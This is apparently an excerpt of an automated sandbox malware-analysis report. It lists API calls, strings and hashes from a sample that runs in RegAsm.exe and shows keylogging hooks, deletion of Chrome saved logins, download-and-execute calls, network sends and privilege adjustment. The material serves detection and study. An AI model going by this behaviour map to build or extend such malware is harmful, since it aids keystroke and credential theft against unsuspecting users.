                                  Yara matches
                                  Similarity
                                  • API ID: File$Find$CreateFirstNext
                                  • String ID: 8SG$PXG$PXG$NG$PG
                                  • API String ID: 341183262-3812160132
                                  • Opcode ID: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                                  • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                  • Opcode Fuzzy Hash: a5597b3f65d10343650a1b8aec819c1f417a5ef5d46547a6ada3e27d2cae3aed
                                  • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                  • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                  • GetLastError.KERNEL32 ref: 0040A2ED
                                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                  • TranslateMessage.USER32(?), ref: 0040A34A
                                  • DispatchMessageA.USER32(?), ref: 0040A355
                                  Strings
                                  • Keylogger initialization failure: error , xrefs: 0040A301
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                  • String ID: Keylogger initialization failure: error
                                  • API String ID: 3219506041-952744263
                                  • Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                                  • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                  • Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                                  • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                  APIs
                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 0040A416
                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                  • GetKeyState.USER32(00000010), ref: 0040A433
                                  • GetKeyboardState.USER32(?,?,00000000), ref: 0040A43E
                                  • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                  • ToUnicodeEx.USER32(00000054,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                  • String ID:
                                  • API String ID: 1888522110-0
                                  • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                  • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                  • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                  • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                  APIs
                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                  • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                  • API String ID: 2127411465-314212984
                                  • Opcode ID: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                                  • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                  • Opcode Fuzzy Hash: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                                  • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                  APIs
                                  • _free.LIBCMT ref: 00449212
                                  • _free.LIBCMT ref: 00449236
                                  • _free.LIBCMT ref: 004493BD
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                  • _free.LIBCMT ref: 00449589
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                  • String ID:
                                  • API String ID: 314583886-0
                                  • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                  • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                  • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                  • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                  APIs
                                    • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                  • API String ID: 1589313981-2876530381
                                  • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                  • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                  • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                  • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                  • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP$['E
                                  • API String ID: 2299586839-2532616801
                                  • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                  • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                  • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                  • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                  • GetLastError.KERNEL32 ref: 0040BA58
                                  Strings
                                  • UserProfile, xrefs: 0040BA1E
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                  • [Chrome StoredLogins not found], xrefs: 0040BA72
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 2018770650-1062637481
                                  • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                  • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                  • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                  • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • GetLastError.KERNEL32 ref: 0041799D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                  • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                  • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                  • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                  • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                                  • Opcode Fuzzy Hash: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                  • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00409258
                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                  • FindClose.KERNEL32(00000000), ref: 004093C1
                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                  • FindClose.KERNEL32(00000000), ref: 004095B9
                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                  • String ID:
                                  • API String ID: 1824512719-0
                                  • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                  • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                  • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                  • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                  • String ID:
                                  • API String ID: 276877138-0
                                  • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                  • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                  • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                  • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                  • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                  • _wcschr.LIBVCRUNTIME ref: 00451E58
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                  • String ID: sJD
                                  • API String ID: 4212172061-3536923933
                                  • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                  • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                  • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                  • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                  APIs
                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                  • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                  • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                  • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                  • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                  • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                  • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0040966A
                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstH_prologNext
                                  • String ID:
                                  • API String ID: 1157919129-0
                                  • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                  • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                  • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                  • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00408811
                                  • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                  • String ID:
                                  • API String ID: 1771804793-0
                                  • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                  • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                  • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                  • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DownloadExecuteFileShell
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2825088817-3056885514
                                  • Opcode ID: 3e962aae1bf6d9a082c2cb8e7c72c1813a0f1391a4c7d5151776bd2fdf264440
                                  • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                  • Opcode Fuzzy Hash: 3e962aae1bf6d9a082c2cb8e7c72c1813a0f1391a4c7d5151776bd2fdf264440
                                  • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNextsend
                                  • String ID: XPG$XPG
                                  • API String ID: 4113138495-1962359302
                                  • Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                  • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                  • Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                  • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                  APIs
                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                    • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                    • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137A6
                                    • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.0.0 Pro), ref: 004137B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 4127273184-3576401099
                                  • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                  • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                  • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                  • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                  APIs
                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                  • String ID:
                                  • API String ID: 2829624132-0
                                  • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                  • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                  • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                  • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                  • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                  • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                  • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                  • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                  • ExitProcess.KERNEL32 ref: 004432EF
                                  Memory Dump Source
